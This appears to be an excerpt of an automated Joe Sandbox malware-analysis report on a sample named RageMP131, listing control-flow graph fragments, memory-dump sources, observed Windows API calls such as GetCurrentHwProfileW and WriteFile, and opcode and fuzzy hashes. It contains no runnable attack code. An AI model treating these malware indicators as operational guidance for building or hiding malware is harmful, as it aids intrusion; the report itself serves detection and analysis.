                                    • Opcode Fuzzy Hash: 8ec79d8d5581459b19fc749cafe0c603d61dd745b48af954a6b211efb5017aa3
                                    • Instruction Fuzzy Hash: 8F51FFF73CD214ACF14285955B60EF62A6EE7CB334730A4A3F407D6E62F2846AC96431

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 498 4e10854-4e1085c 499 4e108aa 498->499 500 4e1085e-4e10895 498->500 502 4e108ab-4e109ab 499->502 500->502 518 4e109bc-4e109f7 call 4e109f9 502->518 522 4e109f9-4e10aab 518->522 531 4e10ab7-4e10abd GetCurrentHwProfileW 522->531 532 4e10acd-4e10cc8 call 4e10cdb 531->532
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c81fe3c748e2be91df68a34d5a624059c6e44a02231f4da2725f1cca534bd211
                                    • Instruction ID: ddc691422b16719d57c33c51ce84371dae979b6188dfcbee4d49ff4d30d247bf
                                    • Opcode Fuzzy Hash: c81fe3c748e2be91df68a34d5a624059c6e44a02231f4da2725f1cca534bd211
                                    • Instruction Fuzzy Hash: F251FFF73CD214BDF142C5815B60EF62A6EE7C7330730A462F4079AE62F2946AC96471

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 558 4e1087a-4e109ab 574 4e109bc-4e109f7 call 4e109f9 558->574 578 4e109f9-4e10aab 574->578 587 4e10ab7-4e10abd GetCurrentHwProfileW 578->587 588 4e10acd-4e10cc8 call 4e10cdb 587->588
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 2aadf5a7dabefaa4accb38b0df94c6b2e161941b914dce61835a993771bed5c5
                                    • Instruction ID: 681cba2a622cd4a1a300711ad6bc96a62e74c5bd8f1b337c9ef2d6a8523608f4
                                    • Opcode Fuzzy Hash: 2aadf5a7dabefaa4accb38b0df94c6b2e161941b914dce61835a993771bed5c5
                                    • Instruction Fuzzy Hash: 0B51FEF73CD214BDF14285915B60EF62A6EE7C7334730A462F40796E62F2942EC96431

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 614 4e10900-4e109ab 622 4e109bc-4e109f7 call 4e109f9 614->622 626 4e109f9-4e10aab 622->626 635 4e10ab7-4e10abd GetCurrentHwProfileW 626->635 636 4e10acd-4e10cc8 call 4e10cdb 635->636
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 5c6e728e5c5016ae173864ded15932e4ddd2f7d71a33aeb6a0d4100c9d373acb
                                    • Instruction ID: 0fd19f5fc929ca66cb01e11233c657a1c9fd22dbcc9004bb613882a51cee39cb
                                    • Opcode Fuzzy Hash: 5c6e728e5c5016ae173864ded15932e4ddd2f7d71a33aeb6a0d4100c9d373acb
                                    • Instruction Fuzzy Hash: 3141D0F73CD115BDF14285955B60EF66A6EE7C7334730A0A2B40BD5E62F2842AC96431

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 662 4e10934-4e109ab 669 4e109bc-4e109f7 call 4e109f9 662->669 673 4e109f9-4e10aab 669->673 682 4e10ab7-4e10abd GetCurrentHwProfileW 673->682 683 4e10acd-4e10cc8 call 4e10cdb 682->683
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 293a8977663817612133d3a12d14bac8e4d0d02b6daf0e600a9dd6fc95acc408
                                    • Instruction ID: f81ee82c5bf798f7be729bbdce014eb5a985991e9e8f0f8ab88cb7169b957e4e
                                    • Opcode Fuzzy Hash: 293a8977663817612133d3a12d14bac8e4d0d02b6daf0e600a9dd6fc95acc408
                                    • Instruction Fuzzy Hash: 0241EFF73CD115ADF14285915B60EF66AAEE7C7334730A4A3F40B95E62F2842AC96421

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 709 4e109cf-4e109d3 710 4e10972-4e109ab 709->710 711 4e109d5-4e109d7 709->711 716 4e109bc-4e109ca 710->716 711->710 713 4e109d9-4e109dd 711->713 715 4e109df-4e109f7 call 4e109f9 713->715 715->716 719 4e109f9-4e10aab 715->719 716->715 728 4e10ab7-4e10abd GetCurrentHwProfileW 719->728 729 4e10acd-4e10cc8 call 4e10cdb 728->729
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 05e796a48a3a14ad95834b6a1557e919541633a2e54f9ac4288d169cfd52144c
                                    • Instruction ID: 3216fa25d3e25426567bcddcfa8a86b9d3049f04330542e1d4ae0b05925be83a
                                    • Opcode Fuzzy Hash: 05e796a48a3a14ad95834b6a1557e919541633a2e54f9ac4288d169cfd52144c
                                    • Instruction Fuzzy Hash: B2411FF73CD114BDF10285811B60EF66A6EE7C7334B30A0A3F40795E62F3842AC92421

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 755 4e10945-4e109ab 761 4e109bc-4e109f7 call 4e109f9 755->761 765 4e109f9-4e10aab 761->765 774 4e10ab7-4e10abd GetCurrentHwProfileW 765->774 775 4e10acd-4e10cc8 call 4e10cdb 774->775
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 2080a2f412b3af1bfa31d3d8ef37619b5da11e3bd01a094eb08161ff0ae1f02b
                                    • Instruction ID: 6a23b1d952b71e867647fc299ed95958a1ce0352a5df2651dabbaeff79d3308d
                                    • Opcode Fuzzy Hash: 2080a2f412b3af1bfa31d3d8ef37619b5da11e3bd01a094eb08161ff0ae1f02b
                                    • Instruction Fuzzy Hash: 054100F73CD115EDF14285911B60EF66AAEE7C7334730A0A2B407A6E62F3842AC97431
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 286d7b01e7cd43946adebf3ed4b08c54ba0e13b0ecc47e60596dbc063899d13c
                                    • Instruction ID: e648917b09195292ae91edbb5a004f62eb5bb5e0866fb0ed1f959ad9148497f2
                                    • Opcode Fuzzy Hash: 286d7b01e7cd43946adebf3ed4b08c54ba0e13b0ecc47e60596dbc063899d13c
                                    • Instruction Fuzzy Hash: E24111F73CD115EDF10285515B60EF66A6EE7C7334B30A462B40B96E62F3842AC96432
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000000,00356747,?,00000000,00000000,00000000,?,00000000,?,0034BC71,00356747,00000000,0034BC71,?,?), ref: 00362CE1
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: e6ba5b684291c28729d4bcdec7cafd780895db7922f1d2ae0174ce26500bf6ab
                                    • Instruction ID: 16b1fef1f77ec205fb3e2e3c1905d935d40d42a614ec55aa8713f2f06a9a3855
                                    • Opcode Fuzzy Hash: e6ba5b684291c28729d4bcdec7cafd780895db7922f1d2ae0174ce26500bf6ab
                                    • Instruction Fuzzy Hash: 0961C171D00909AEDF13DFA8C884EEFBFB9EF19304F168145E810AB25AD771D9019BA0
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 4192e3cd433740c95b173ba099935f6c160ab1208cc6f8baf7a319c03c422a99
                                    • Instruction ID: 54c7d0c4c13801f7e44a390d8ddcf755ef1746cc10b4a738249eb00471c158cb
                                    • Opcode Fuzzy Hash: 4192e3cd433740c95b173ba099935f6c160ab1208cc6f8baf7a319c03c422a99
                                    • Instruction Fuzzy Hash: 2C4133F73CD105EDF20685505760EF62BADEBC7334B30A0A3E407A6D22F3842AC96521
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 1fd5153b7f6846b84a700204cb02daef8c8c530b3783716e0b7bf866ebc408c7
                                    • Instruction ID: 0e339a0a5215d5a6a64f1b1c90915bec3265c82f3d198478fcc61b69e73444a6
                                    • Opcode Fuzzy Hash: 1fd5153b7f6846b84a700204cb02daef8c8c530b3783716e0b7bf866ebc408c7
                                    • Instruction Fuzzy Hash: 394100F73CD105EDF20285815B50EF66A6DE7C7334B30A4A7E407A6D62F3946AC96422
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: dee5d9235b9068f500557fe2ff39a95556005ca10e1feb0f6593f2dd4ee64a0b
                                    • Instruction ID: 2e060bcf276db5e6e52779a65a512b38b9e79ca8effff7de62adb206beaf3043
                                    • Opcode Fuzzy Hash: dee5d9235b9068f500557fe2ff39a95556005ca10e1feb0f6593f2dd4ee64a0b
                                    • Instruction Fuzzy Hash: 4731EFF73CD115EDE14685411B50EF626AEE7CB334730A4A3B40BA6E62F3842AC97421
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 55c29e76ff5ea39db8f6171437a8a583f9ffec9c3f3a9e45444319eb52cbe763
                                    • Instruction ID: b2a5d744e1ff63be9dea819d2b72dc946e4e6adc7ac54daeba275c147f27cbda
                                    • Opcode Fuzzy Hash: 55c29e76ff5ea39db8f6171437a8a583f9ffec9c3f3a9e45444319eb52cbe763
                                    • Instruction Fuzzy Hash: 023136F73CD211EDF10285551B50EF626AEE7D7334730A4A3A40BD6E22F3846AC93861
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 1d3a1e70f1957552c1f6179c4c814402b0a1ea14ffee7f297cd87807c81d3604
                                    • Instruction ID: c0a67cc34f0c237795ce37095ca1f8e867c3f98d434aae957ed77b954425c9f3
                                    • Opcode Fuzzy Hash: 1d3a1e70f1957552c1f6179c4c814402b0a1ea14ffee7f297cd87807c81d3604
                                    • Instruction Fuzzy Hash: 3831E2F73CD215EDE101C9511B50EF626ADE7DB334730A4A3B40BE6E62F3942AC96421
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 002DB801
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID:
                                    • API String ID: 118556049-0
                                    • Opcode ID: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
                                    • Instruction ID: 5441e7ef84b5f53079044b1ec15c9aaa8963aaa47863f86671376b015b82f037
                                    • Opcode Fuzzy Hash: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
                                    • Instruction Fuzzy Hash: D8410372910115DBDB06DF68D8916AEB7E9EF84350F16026AE805EB341D730EE2187E1
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 770ef8e3631b4dc34dbd0e6974212a7eb37f7b7f827fde24421ade50819c9a86
                                    • Instruction ID: 505d88f3a7b3a46b0b67bec5c9feb1c0e17ccf2c7928a222051d0dca6b28fda5
                                    • Opcode Fuzzy Hash: 770ef8e3631b4dc34dbd0e6974212a7eb37f7b7f827fde24421ade50819c9a86
                                    • Instruction Fuzzy Hash: 422127B73CE200EDF115C9515B50EFA676DE7C7334730A4A2E407D2961F3906AC96922
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 813483ba0bfe3996db9a46f99acdb626f7c63ef1f3586b454c6e153359966da2
                                    • Instruction ID: 68f519bdfe21465640fd346999d33e349661a98bcb9199b6a781c97871b5a1ad
                                    • Opcode Fuzzy Hash: 813483ba0bfe3996db9a46f99acdb626f7c63ef1f3586b454c6e153359966da2
                                    • Instruction Fuzzy Hash: FA21A0FB3CD215EDE11189511B50EF6666DE7CB234730A4A2B407D6A21F3846AC96822
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 9155cd5a608dd921b3d8c62270fa70d077fef1578a3be5a2cdf9957a1d939fdf
                                    • Instruction ID: fffdaa0800298e36cace2be039dbdd97b416139e18d4cb8e14cee563e2ffafd5
                                    • Opcode Fuzzy Hash: 9155cd5a608dd921b3d8c62270fa70d077fef1578a3be5a2cdf9957a1d939fdf
                                    • Instruction Fuzzy Hash: DF2139B73CE241EDF11589511750EFA6B6DE7C7334730A4A2E40792962F3942AC96922
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10AB8
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744600915.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e10000_RageMP131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: d19a364a75ab406c57c1ce375a55173562bfe1864ae789a60725318ce5960fc6
                                    • Instruction ID: a0ce99484d2b2499158e0f02cdc2bd554c46680dea10e252a8c1db8f75b99cf0
                                    • Opcode Fuzzy Hash: d19a364a75ab406c57c1ce375a55173562bfe1864ae789a60725318ce5960fc6
                                    • Instruction Fuzzy Hash: 782123B73CD115ECE1018A801750EF6666DE7CB334730A4A2F407E2D22F3802AC93876
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,003620B9,00000000,CF830579,003A1090,0000000C,00362175,0035627D,?), ref: 00362228
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: 60a1c3a25f4b1f95ee331cf92a018c741e58db80dec6ff25d630cf6715c43de3
                                    • Instruction ID: df5dbf59c979e9c004d0bead54d92eb03ab5db389fbf8ad16e7fb4060ca43ba6
                                    • Opcode Fuzzy Hash: 60a1c3a25f4b1f95ee331cf92a018c741e58db80dec6ff25d630cf6715c43de3
                                    • Instruction Fuzzy Hash: A9116633709A1417D6232374AC51B7F2B898F83738F778A19FA189F1DADA719C814191
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,003A0D48,0034BC71,00000002,0034BC71,00000000,?,?,?,0035B826,00000000,?,0034BC71,00000002,003A0D48), ref: 0035B758
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 53c3af6c1cf2bfd9c6dd8f0ef1604c6ede498b2c3df49efc524ab25068249f8c
                                    • Instruction ID: 2c20a63aec701815330d38a7ed07adc87dabaa970cbe34b664064a8dfab32ac7
                                    • Opcode Fuzzy Hash: 53c3af6c1cf2bfd9c6dd8f0ef1604c6ede498b2c3df49efc524ab25068249f8c
                                    • Instruction Fuzzy Hash: DB01D632614615AFCF069F59CC41C9E7B69DF85325B250208FC519B2A1EB71ED419BD0
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00271FDE
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID:
                                    • API String ID: 2659868963-0
                                    • Opcode ID: f4cb14645893d106bb9267af0bf2f64ca02ae6c1ed09eef8faaeb7f6458880cd
                                    • Instruction ID: d98d723dc47e0134ebda18c26e577aef07dfab764ff735bc4e1a36079e55243a
                                    • Opcode Fuzzy Hash: f4cb14645893d106bb9267af0bf2f64ca02ae6c1ed09eef8faaeb7f6458880cd
                                    • Instruction Fuzzy Hash: C301D63981030DB7CB26AEA8DC0189977EC9E06360B508525F918AE9A1FB70FA648795
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,0034ADBC,?,?,00363439,00000001,00000364,?,00000006,000000FF,?,0034DD3B,?,?,?,?), ref: 00363AF4
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
